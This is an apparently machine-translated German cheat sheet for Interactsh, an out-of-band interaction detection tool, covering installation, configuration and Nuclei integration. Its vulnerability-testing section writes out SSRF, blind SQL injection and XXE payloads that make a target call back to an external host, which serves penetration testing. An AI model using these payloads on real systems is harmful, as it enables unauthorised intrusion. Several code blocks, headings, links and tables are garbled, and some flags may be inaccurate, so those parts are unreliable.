Zum Inhalt

Interactsh OOB Interaction Cheat Sheet sammeln

Überblick

Interactsh ist ein Open-Source-Tool, das von Project Discovery entwickelt wurde, um Out-of-Band (OOB) Interaktionen zu erkennen. Es ist entworfen, um Schwachstellen zu identifizieren, die externe Interaktionen verursachen, wie Server-Side Request Forgery (SSRF), Blind SQL Injection, XML External Entity (XXE) Injection, und andere Schwachstellen, die durch traditionelle Testmethoden nicht sofort sichtbar sein können.

Was Interactsh einzigartig macht, ist der umfassende Ansatz für OOB-Tests. Im Gegensatz zu anderen Tools, die sich auf bestimmte Protokolle konzentrieren, kann Interactsh Interaktionen über mehrere Protokolle erkennen, einschließlich DNS, HTTP(S), SMTP(S) und LDAP. Es besteht sowohl aus einer Serverkomponente, die diese Interaktionen erfasst und protokolliert, als auch aus einer Clientkomponente, die einzigartige Test-URLs generiert und überwacht für jede Interaktion mit diesen URLs.

Interactsh wird weit verbreitet in Sicherheitstests verwendet, um Schwachstellen zu identifizieren, die sonst unentdeckt werden könnten. Es ist besonders wertvoll für Bug bounty Jäger, Penetration Tester und Sicherheitsforscher, die die Existenz von Schwachstellen überprüfen müssen, die auf externe Interaktionen verlassen. Das Tool ist auch mit Nuclei integriert, einem anderen Project Discovery Tool, das eine automatisierte Schwachstellenerfassung mit OOB-Erkennungsfunktionen ermöglicht.

Installation

Client Installation

Verwenden Sie Go

# Install using Go (requires Go 1.20 or later)
go install -v github.com/projectdiscovery/interactsh/cmd/interactsh-client@latest

# Verify installation
interactsh-client -version
```_

#### Verwendung von Docker

```bash
# Pull the latest Docker image
docker pull projectdiscovery/interactsh:latest

# Run Interactsh client using Docker
docker run -it projectdiscovery/interactsh:latest client -h
```_

#### Verwendung von Homebrew (macOS)

```bash
# Install using Homebrew
brew install interactsh-client

# Verify installation
interactsh-client -version
```_

#### Verwendung von PDTM (Projekt Discovery Tools Manager)

```bash
# Install PDTM first if not already installed
go install -v github.com/projectdiscovery/pdtm/cmd/pdtm@latest

# Install Interactsh client using PDTM
pdtm -i interactsh-client

# Verify installation
interactsh-client -version
```_

### Serverinstallation (Self-Hosted)

#### Verwenden Sie Go

```bash
# Install using Go (requires Go 1.20 or later)
go install -v github.com/projectdiscovery/interactsh/cmd/interactsh-server@latest

# Verify installation
interactsh-server -version
```_

#### Verwendung von Docker

```bash
# Pull the latest Docker image
docker pull projectdiscovery/interactsh:latest

# Run Interactsh server using Docker
docker run -it projectdiscovery/interactsh:latest server -h
```_

## Basisnutzung

### Nutzung des Kunden

```bash
# Start the client with default settings
interactsh-client

# Start the client with verbose output
interactsh-client -v

# Start the client with a specific server
interactsh-client -server your-interactsh-server.com
```_

### Servernutzung (Selbstbeheizt)

```bash
# Start the server with default settings
interactsh-server

# Start the server with a specific domain
interactsh-server -domain your-domain.com

# Start the server with verbose output
interactsh-server -v
```_

### Ausgabeoptionen

```bash
# Save interactions to a file
interactsh-client -o interactions.log

# Output in JSON format
interactsh-client -json -o interactions.json

# Silent mode (no banner)
interactsh-client -silent
```_

## Client Konfiguration

### Grundkonfiguration

```bash
# Set polling interval (seconds)
interactsh-client -poll-interval 5

# Set interaction timeout (seconds)
interactsh-client -interaction-timeout 60

# Enable persistent session
interactsh-client -persistent-session

# Use a specific correlation ID
interactsh-client -correlation-id your-correlation-id
```_

### Authentication

```bash
# Use token for authentication
interactsh-client -token your-auth-token

# Use a specific server with token
interactsh-client -server your-interactsh-server.com -token your-auth-token
```_

### Filtern

```bash
# Filter interactions by type
interactsh-client -filter-type dns,http

# Filter interactions by IP
interactsh-client -filter-ip 1.2.3.4

# Filter interactions by content
interactsh-client -filter-content "admin"
```_

## Serverkonfiguration (Self-Hosted)

### Domain Konfiguration

```bash
# Set domain for the server
interactsh-server -domain your-domain.com

# Set wildcard domain
interactsh-server -domain your-domain.com -wildcard

# Set IP address to listen on
interactsh-server -ip 1.2.3.4
```_

### Zertifikat Konfiguration

```bash
# Use Let's Encrypt for certificates
interactsh-server -domain your-domain.com -letsencrypt

# Use custom certificates
interactsh-server -domain your-domain.com -cert cert.pem -key key.pem
```_

### Authentication Konfiguration

```bash
# Enable authentication
interactsh-server -auth

# Set token for authentication
interactsh-server -auth-token your-auth-token

# Set token file for authentication
interactsh-server -auth-token-file tokens.txt
```_

## Erweiterte Nutzung

### Client erweiterte Funktionen

```bash
# Generate a specific number of URLs
interactsh-client -n 5

# Generate URLs with a specific payload
interactsh-client -payload-template "\\\\{\\\\{random\\\\}\\\\}.your-domain.com"

# Enable DNS callback only
interactsh-client -dns-only

# Enable HTTP callback only
interactsh-client -http-only

# Enable SMTP callback only
interactsh-client -smtp-only
```_

### Server Erweiterte Funktionen

```bash
# Enable specific services
interactsh-server -dns -http -smtp -ldap

# Disable specific services
interactsh-server -no-dns -no-http -no-smtp -no-ldap

# Set custom ports
interactsh-server -dns-port 53 -http-port 80 -https-port 443 -smtp-port 25 -smtps-port 587 -ldap-port 389

# Enable metrics
interactsh-server -metrics
```_

### Nutzlasterzeugung

```bash
# Generate a URL for testing
interactsh-client -generate-url

# Generate multiple URLs
interactsh-client -generate-url -n 5

# Generate URL with specific server
interactsh-client -generate-url -server your-interactsh-server.com
```_

## Integration mit anderen Tools

### Integration mit Nuclei

```bash
# Use Interactsh with Nuclei
nuclei -u https://example.com -t nuclei-templates/

# Use a specific Interactsh server with Nuclei
nuclei -u https://example.com -t nuclei-templates/ -interactsh-server your-interactsh-server.com

# Disable Interactsh in Nuclei
nuclei -u https://example.com -t nuclei-templates/ -no-interactsh
```_

### Integration mit Benachrichtigung

```bash
# Send Interactsh interactions to Discord
interactsh-client|notify -provider discord

# Send filtered interactions to Slack
interactsh-client -filter-type http|notify -provider slack
```_

### Integration mit benutzerdefinierten Skripten

```bash
# Use Interactsh in a bash script
#!/bin/bash
URL=$(interactsh-client -generate-url)
curl -s "https://example.com/test?url=$URL"
interactsh-client -poll-interval 5 -interaction-timeout 30
```_

## Prüfung Schwachstellen

### Prüfung SSRF

```bash
# Generate a URL for SSRF testing
URL=$(interactsh-client -generate-url)

# Use the URL in a potential SSRF vulnerability
curl -s "https://example.com/fetch?url=http://$URL/test"

# Monitor for interactions
interactsh-client -poll-interval 5 -interaction-timeout 30
```_

### Blind SQL Injection testen

```bash
# Generate a URL for Blind SQL Injection testing
URL=$(interactsh-client -generate-url)

# Use the URL in a SQL query
curl -s "https://example.com/search?id=1' UNION SELECT LOAD_FILE(CONCAT('\\\\',$URL,'\\share'))"

# Monitor for interactions
interactsh-client -poll-interval 5 -interaction-timeout 30
```_

### Prüfung XXE Injektion

```bash
# Generate a URL for XXE testing
URL=$(interactsh-client -generate-url)

# Create an XML payload with XXE
cat > xxe.xml << EOF
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://$URL/xxe">
]>
<foo>&xxe;</foo>
EOF

# Send the XML payload
curl -s -X POST -d @xxe.xml -H "Content-Type: application/xml" https://example.com/api

# Monitor for interactions
interactsh-client -poll-interval 5 -interaction-timeout 30
```_

## Fehlerbehebung

### Gemeinsame Themen

1. ** Keine Interaktionen festgestellt**
```bash
   # Increase polling interval
   interactsh-client -poll-interval 10

   # Increase interaction timeout
   interactsh-client -interaction-timeout 120

   # Check if the target is behind a firewall
   # Try using different protocols (DNS, HTTP, SMTP)

```_

2. ** Anfragen*
```bash
   # Check if the server is reachable
   ping your-interactsh-server.com

   # Try a different server
   interactsh-client -server oast.pro

   # Check if your network allows outbound connections

```_

3. **Authentifizierungsfragen*
```bash
   # Verify token
   interactsh-client -server your-interactsh-server.com -token your-auth-token -v

   # Check if the server requires authentication

```_

4. ** Server Setup Issues*
```bash
   # Check DNS configuration
   dig ns your-domain.com

   # Verify that your domain's nameservers point to your server
   # Ensure that your server has the necessary ports open

```_

### Debugging

```bash
# Enable verbose mode for client
interactsh-client -v

# Enable debug mode for client
interactsh-client -debug

# Enable verbose mode for server
interactsh-server -v

# Enable debug mode for server
interactsh-server -debug
```_

## Selbstheilungsführer

### DNS Konfiguration

Um Self-host Interactsh zu konfigurieren, müssen Sie die DNS-Einstellungen Ihrer Domain konfigurieren:

1. Registrieren Sie eine Domain (z.B. `your-domain.com`_)
2. Richten Sie NS-Datensätze für Ihre Domain ein, um auf Ihren Server zu zeigen:

your-domain.com. IN NS ns1.your-domain.com. your-domain.com. IN NS ns2.your-domain.com.

3. Erstellen Sie eine Datensätze für Ihre Nameserver:

ns1.your-domain.com. IN A your-server-ip ns2.your-domain.com. IN A your-server-ip

```_

Server Setup

```bash

Start the server with your domain

interactsh-server -domain your-domain.com

Enable Let's Encrypt for HTTPS

interactsh-server -domain your-domain.com -letsencrypt

Enable authentication

interactsh-server -domain your-domain.com -auth -auth-token your-auth-token ```_

Einsatz von Docker

```bash

Create a docker-compose.yml file

cat > docker-compose.yml << EOF version: '3' services: interactsh-server: image: projectdiscovery/interactsh:latest command: server -domain your-domain.com -letsencrypt -auth -auth-token your-auth-token ports: - "53:53/udp" - "80:80" - "443:443" - "25:25" - "587:587" - "389:389" restart: always EOF

Start the server

docker-compose up -d ```_

Konfiguration

Client Konfiguration Datei

Interactsh Client verwendet eine Konfigurationsdatei, die sich auf $HOME/.config/interactsh-client/config.yaml_ befindet. Sie können verschiedene Einstellungen in dieser Datei anpassen:

```yaml

Example configuration file

server: oast.pro token: your-auth-token poll-interval: 5 interaction-timeout: 60 filter-type: dns,http ```_

Serverkonfiguration Datei

Interactsh Server verwendet eine Konfigurationsdatei, die sich auf $HOME/.config/interactsh-server/config.yaml_ befindet. Sie können verschiedene Einstellungen in dieser Datei anpassen:

```yaml

Example configuration file

domain: your-domain.com ip: 1.2.3.4 letsencrypt: true auth: true auth-token: your-auth-token ```_

Umweltvariablen

```bash

Set Interactsh client configuration via environment variables

export INTERACTSH_SERVER=oast.pro export INTERACTSH_TOKEN=your-auth-token export INTERACTSH_POLL_INTERVAL=5 export INTERACTSH_INTERACTION_TIMEOUT=60

Set Interactsh server configuration via environment variables

export INTERACTSH_DOMAIN=your-domain.com export INTERACTSH_IP=1.2.3.4 export INTERACTSH_LETSENCRYPT=true export INTERACTSH_AUTH=true export INTERACTSH_AUTH_TOKEN=your-auth-token ```_

Sachgebiet

Optionen der Client Command Line

| | Flag | Description | | | --- | --- | | | -server | Interactsh server to use | | | | -token | Authentication token for the server | | | | -n | Number of URLs to generate | | | | -o, -output | File to write output to | | | | -json | Write output in JSON format | | | | -v, -verbose | Show verbose output | | | | -debug | Show debug information | | | | -poll-interval | Polling interval in seconds | | | | -interaction-timeout | Interaction timeout in seconds | | | | -persistent-session | Enable persistent session | | | | -correlation-id | Correlation ID for the session | | | | -filter-type | Filter interactions by type (dns, http, smtp, ldap) | | | | -filter-ip | Filter interactions by IP | | | | -filter-content | Filter interactions by content | | | | -generate-url | Generate URL for testing | | | | -dns-only | Enable DNS callback only | | | | -http-only | Enable HTTP callback only | | | | -smtp-only | Enable SMTP callback only | | | | -ldap-only | Enable LDAP callback only | | | | -payload-template | Custom payload template | | | | -version | Show Interactsh client version | |

Server Befehlszeilenoptionen

| | Flag | Description | | | --- | --- | | | -domain | Domain to use for the server | | | | -ip | IP address to listen on | | | | -wildcard | Enable wildcard domain | | | | -letsencrypt | Use Let's Encrypt for certificates | | | | -cert | Path to certificate file | | | | -key | Path to key file | | | | -auth | Enable authentication | | | | -auth-token | Authentication token | | | | -auth-token-file | File containing authentication tokens | | | | -dns | Enable DNS service | | | | -http | Enable HTTP service | | | | -smtp | Enable SMTP service | | | | -ldap | Enable LDAP service | | | | -no-dns | Disable DNS service | | | | -no-http | Disable HTTP service | | | | -no-smtp | Disable SMTP service | | | | -no-ldap | Disable LDAP service | | | | -dns-port | Port for DNS service | | | | -http-port | Port for HTTP service | | | | -https-port | Port for HTTPS service | | | | -smtp-port | Port for SMTP service | | | | -smtps-port | Port for SMTPS service | | | | -ldap-port | Port for LDAP service | | | | -metrics | Enable metrics | | | | -v, -verbose | Show verbose output | | | | -debug | Show debug information | | | | -version | Show Interactsh server version | |

Unterstützte Interaktion Arten

| | Type | Description | | | --- | --- | | | dns | DNS interactions | | | | http | HTTP/HTTPS interactions | | | | smtp | SMTP/SMTPS interactions | | | | ldap | LDAP interactions | |

Ressourcen

  • [offizielle Dokumentation](__LINK_3___
  • [GitHub Repository](_LINK_3__
  • [Project Discovery Discord](__LINK_3___

--

*Dieses Cheatsheet bietet eine umfassende Referenz für die Nutzung von Interactsh, von der Basis-Client- und Servernutzung bis hin zur erweiterten Konfiguration und Integration mit anderen Tools. Für die aktuellsten Informationen finden Sie immer die offizielle Dokumentation. *